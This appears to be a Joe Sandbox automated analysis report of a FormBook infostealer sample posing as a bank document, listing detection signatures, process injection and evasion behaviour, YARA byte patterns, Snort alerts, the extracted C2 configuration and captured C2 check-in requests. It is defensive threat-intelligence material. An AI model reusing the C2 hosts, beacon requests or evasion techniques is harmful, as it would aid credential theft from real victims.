Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Document de bancobpi_66473474.exe

Overview

General Information

Sample Name:Document de bancobpi_66473474.exe
Analysis ID:630121
MD5:5888637a68b3b9148ecca46cad771d0a
SHA1:837f9af554f72a9d7fd6863ef6c01a6bc38cfee5
SHA256:4de7c33ddb30a012b6738c828d89661d07440f173445c072042708f7a63990d7
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected UAC Bypass using CMSTP
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Document de bancobpi_66473474.exe (PID: 6960 cmdline: "C:\Users\user\Desktop\Document de bancobpi_66473474.exe" MD5: 5888637A68B3B9148ECCA46CAD771D0A)
    • setup16.exe (PID: 6280 cmdline: C:\Windows\SysWOW64\setup16.exe MD5: 1BF408509BDFB41967FEA0EB1493786B)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 7156 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 1428 cmdline: /c del "C:\Windows\SysWOW64\setup16.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.abtys6.online/arh2/"], "decoy": ["hstorc.com", "blackountry.com", "dhrbakery.com", "dezhouofit.com", "defipayout.xyz", "ginas4t.com", "byzbh63.xyz", "qrcrashview.com", "mialibaby.com", "enhaut.net", "samainnova.com", "yashveerresort.com", "delfos.online", "dungcumay.com", "lj-counseling.net", "fliptheswitch.pro", "padogbitelawyer.com", "aticarev.com", "sederino.site", "bestplansforpets-japan3.life", "radicallysimplesupps.com", "sandbagmaker.com", "misdcf.xyz", "nbpz.xyz", "floridasunbreaks.com", "justfinishesofcolorado.com", "homemethtestkit.com", "chaquetashapticas.com", "zodiactshirt.com", "tees.email", "zxzx999.com", "tempepdf.com", "watchusroll.com", "parotacenter.com", "assistcourse.online", "paulstilingroup.com", "cnbcfx.com", "mooncore.xyz", "laplugnation.com", "gosti24.com", "cthomassolutions.com", "rkhubs.com", "aboutpier.com", "multimediaroomandboard.com", "iamparrot.com", "wifitest.info", "nounworld.com", "xpartner.biz", "128grandviewdrivenewportnsw.com", "bakiin.com", "suitcell.com", "onehitgamerstudios.com", "bathingsuitsshoppingus.com", "wingstarifa.com", "ccasudqi.com", "epiconscious.com", "ponponshoes.com", "cicom.tech", "safetynetinc.net", "recanto.xyz", "sellsidelite.net", "kevmoinesproperties.com", "hdwallpaperpics.life", "57gznfw.xyz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18809:$sqlite3step: 68 34 1C 7B E1
    • 0x1891c:$sqlite3step: 68 34 1C 7B E1
    • 0x18838:$sqlite3text: 68 38 2A 90 C5
    • 0x1895d:$sqlite3text: 68 38 2A 90 C5
    • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000000.338228196.000000000D15C000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000000.338228196.000000000D15C000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x6345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x5df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x6447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x65bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb987:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 41 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.setup16.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.setup16.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bc8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.setup16.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a09:$sqlite3step: 68 34 1C 7B E1
        • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a38:$sqlite3text: 68 38 2A 90 C5
        • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
        6.0.setup16.exe.400000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.0.setup16.exe.400000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 25 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.3185.53.179.9249783802031449 05/19/22-14:10:39.499329
          SID:2031449
          Source Port:49783
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.323.227.38.7449799802031412 05/19/22-14:10:44.609733
          SID:2031412
          Source Port:49799
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3185.53.179.9249783802031412 05/19/22-14:10:39.499329
          SID:2031412
          Source Port:49783
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.323.227.38.7449799802031449 05/19/22-14:10:44.609733
          SID:2031449
          Source Port:49799
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3185.53.179.9249783802031453 05/19/22-14:10:39.499329
          SID:2031453
          Source Port:49783
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.323.227.38.7449799802031453 05/19/22-14:10:44.609733
          SID:2031453
          Source Port:49799
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.abtys6.online/arh2/"], "decoy": ["hstorc.com", "blackountry.com", "dhrbakery.com", "dezhouofit.com", "defipayout.xyz", "ginas4t.com", "byzbh63.xyz", "qrcrashview.com", "mialibaby.com", "enhaut.net", "samainnova.com", "yashveerresort.com", "delfos.online", "dungcumay.com", "lj-counseling.net", "fliptheswitch.pro", "padogbitelawyer.com", "aticarev.com", "sederino.site", "bestplansforpets-japan3.life", "radicallysimplesupps.com", "sandbagmaker.com", "misdcf.xyz", "nbpz.xyz", "floridasunbreaks.com", "justfinishesofcolorado.com", "homemethtestkit.com", "chaquetashapticas.com", "zodiactshirt.com", "tees.email", "zxzx999.com", "tempepdf.com", "watchusroll.com", "parotacenter.com", "assistcourse.online", "paulstilingroup.com", "cnbcfx.com", "mooncore.xyz", "laplugnation.com", "gosti24.com", "cthomassolutions.com", "rkhubs.com", "aboutpier.com", "multimediaroomandboard.com", "iamparrot.com", "wifitest.info", "nounworld.com", "xpartner.biz", "128grandviewdrivenewportnsw.com", "bakiin.com", "suitcell.com", "onehitgamerstudios.com", "bathingsuitsshoppingus.com", "wingstarifa.com", "ccasudqi.com", "epiconscious.com", "ponponshoes.com", "cicom.tech", "safetynetinc.net", "recanto.xyz", "sellsidelite.net", "kevmoinesproperties.com", "hdwallpaperpics.life", "57gznfw.xyz"]}
          Yara detected FormBook
          Source: Yara matchFile source: 6.2.setup16.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.setup16.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.setup16.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.338228196.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.299122182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.357277417.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.538727170.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.314192063.0000000003BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.316963754.00000000046E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.369940835.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.369893076.00000000007B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.297403111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.314362271.0000000003C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.298419398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.ponponshoes.com/arh2/?5j1TIdG=AqsknWRV/riizoNmVvG7FCz2heUwdGJDo97IkGz+WM+jgCd41u4hQz4X6wFdUq/gZt5o&ozr=4hLlIp3xzfzHDAvira URL Cloud: Label: malware
          Source: http://www.bathingsuitsshoppingus.com/arh2/?5j1TIdG=K6jUs0mpPBEML/5NzMDHXY6gxTSHaKTmmlbiXWC1vBmmOSfP0HM5UB/sQ7498az1yFs1&ozr=4hLlIp3xzfzHDAvira URL Cloud: Label: malware
          Source: www.abtys6.online/arh2/Avira URL Cloud: Label: phishing
          Source: 6.2.setup16.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: 6.0.setup16.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: 6.0.setup16.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: 6.0.setup16.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: 6.0.setup16.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen2

          Exploits

          barindex
          Yara detected UAC Bypass using CMSTP
          Source: Yara matchFile source: 0.2.Document de bancobpi_66473474.exe.4568448.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Document de bancobpi_66473474.exe PID: 6960, type: MEMORYSTR
          Source: Document de bancobpi_66473474.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Document de bancobpi_66473474.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: msiexec.pdb source: setup16.exe, 00000006.00000002.370046812.0000000000C40000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: D:\a\1\s\src\Microsoft.Identity.Client\obj\Release\net45\Microsoft.Identity.Client.pdb source: Document de bancobpi_66473474.exe, Document de bancobpi_66473474.exe, 00000000.00000002.308101856.0000000000508000.00000020.00000001.01000000.00000003.sdmp
          Source: Binary string: msiexec.pdbGCTL source: setup16.exe, 00000006.00000002.370046812.0000000000C40000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: setup16.pdb source: msiexec.exe, 0000000F.00000002.540850727.0000000005297000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539144057.000000000332B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: setup16.exe, 00000006.00000003.306175651.0000000004807000.00000004.00000800.00020000.00000000.sdmp, setup16.exe, 00000006.00000002.371081823.0000000004ABF000.00000040.00000800.00020000.00000000.sdmp, setup16.exe, 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, setup16.exe, 00000006.00000003.301318253.000000000460C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.371291464.0000000004BBF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.369829774.0000000004A1C000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: setup16.pdbGCTL source: Document de bancobpi_66473474.exe, 00000000.00000002.309996222.0000000002C52000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.540850727.0000000005297000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539144057.000000000332B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: setup16.exe, setup16.exe, 00000006.00000003.306175651.0000000004807000.00000004.00000800.00020000.00000000.sdmp, setup16.exe, 00000006.00000002.371081823.0000000004ABF000.00000040.00000800.00020000.00000000.sdmp, setup16.exe, 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, setup16.exe, 00000006.00000003.301318253.000000000460C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.371291464.0000000004BBF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.369829774.0000000004A1C000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: D:\a\1\s\src\Microsoft.Identity.Client\obj\Release\net45\Microsoft.Identity.Client.pdbSHA256R source: Document de bancobpi_66473474.exe, 00000000.00000002.308101856.0000000000508000.00000020.00000001.01000000.00000003.sdmp
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 4x nop then pop edi6_2_0040CA04
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi15_2_00E7CA04

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.ponponshoes.com
          Source: C:\Windows\explorer.exeDomain query: www.paulstilingroup.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.92 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 171.22.26.13 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.204.236.66 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.253.231 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.wifitest.info
          Source: C:\Windows\explorer.exeDomain query: www.floridasunbreaks.com
          Source: C:\Windows\explorer.exeDomain query: www.rkhubs.com
          Source: C:\Windows\explorer.exeDomain query: www.bathingsuitsshoppingus.com
          Source: C:\Windows\explorer.exeDomain query: www.cthomassolutions.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49783 -> 185.53.179.92:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49783 -> 185.53.179.92:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49783 -> 185.53.179.92:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49799 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49799 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49799 -> 23.227.38.74:80
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.defipayout.xyz
          Source: DNS query: www.byzbh63.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.abtys6.online/arh2/
          Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /arh2/?5j1TIdG=96p+z0lbCXEtn8r3kdhvhAjX1ASZK1voQ/JiiDcNf2/dHgDP8ab1TZBAgNzfa8Mh8PSm&ozr=4hLlIp3xzfzHD HTTP/1.1Host: www.rkhubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /arh2/?5j1TIdG=K6jUs0mpPBEML/5NzMDHXY6gxTSHaKTmmlbiXWC1vBmmOSfP0HM5UB/sQ7498az1yFs1&ozr=4hLlIp3xzfzHD HTTP/1.1Host: www.bathingsuitsshoppingus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /arh2/?5j1TIdG=Dn2b2G7G/trQ3SmQOOzvZCyKhxwSo2sXwRlhdoEbpLnK/FZ0l0AAIUO0K0AUyG9Pn804&ozr=4hLlIp3xzfzHD HTTP/1.1Host: www.cthomassolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /arh2/?5j1TIdG=sfi/U9uziz3yd+cIlnupVfxmGYoGEUQ+cvnH9JBY/zXkxzDvMNHWuq6jibpyEsrEd8HV&ozr=4hLlIp3xzfzHD HTTP/1.1Host: www.paulstilingroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /arh2/?5j1TIdG=AqsknWRV/riizoNmVvG7FCz2heUwdGJDo97IkGz+WM+jgCd41u4hQz4X6wFdUq/gZt5o&ozr=4hLlIp3xzfzHD HTTP/1.1Host: www.ponponshoes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 185.53.179.92 185.53.179.92
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 19 May 2022 12:10:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 19 May 2022 12:10:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 241X-Sorting-Hat-ShopId: 64209715442X-Dc: gcp-europe-west1X-Request-ID: d945d2e5-05ef-4fd2-83eb-071016fb7061X-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 70dcbb2cd8636957-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
